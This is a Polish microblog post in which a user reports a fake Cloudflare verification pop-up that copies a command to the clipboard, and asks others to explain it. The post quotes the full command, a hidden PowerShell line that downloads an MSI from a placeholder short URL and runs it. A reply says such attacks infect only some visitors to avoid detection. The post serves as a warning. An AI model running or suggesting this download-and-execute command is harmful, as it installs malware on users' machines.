Wpis z mikrobloga

Na stronie japomoto.pl wyskakuje mi pop-up niby od Cloudflare, że nie może zweryfikować, że jestem człowiekiem. Pokazuje się obrazek (poniżej) i automatycznie kopiuje mi do schowka kod

cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\users\public\3aw.msi'; Invoke-RestMethod -Uri 'https://cośtam.short.gy/1' -OutFile $path; Start-Process $path;
Adres w kodzie powyżej zmieniłem, żeby nikt się nie naciął. Oczywiście nic nie wklejam, ale jestem ciekaw co to polecenie zrobi.

Pomożecie rozszyfrować?
#hacking #wirus #cyberbezpieczenstwo
tomilipin - Na stronie japomoto.pl wyskakuje mi pop-up niby od Cloudflare, że nie moż...

źródło: Zrzut ekranu 2025-02-10 210023

Pobierz
  • 7
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

  • 0
@virusriddle takie ataki działają wybiórczo żeby trudno było je namierzyć. Przykładowo na 100 zapytań "czy jesteś robotem" będzie próbowało zainfekować jedną osobę a w przypadku reszty będzie zachowywać się normalnie.
  • Odpowiedz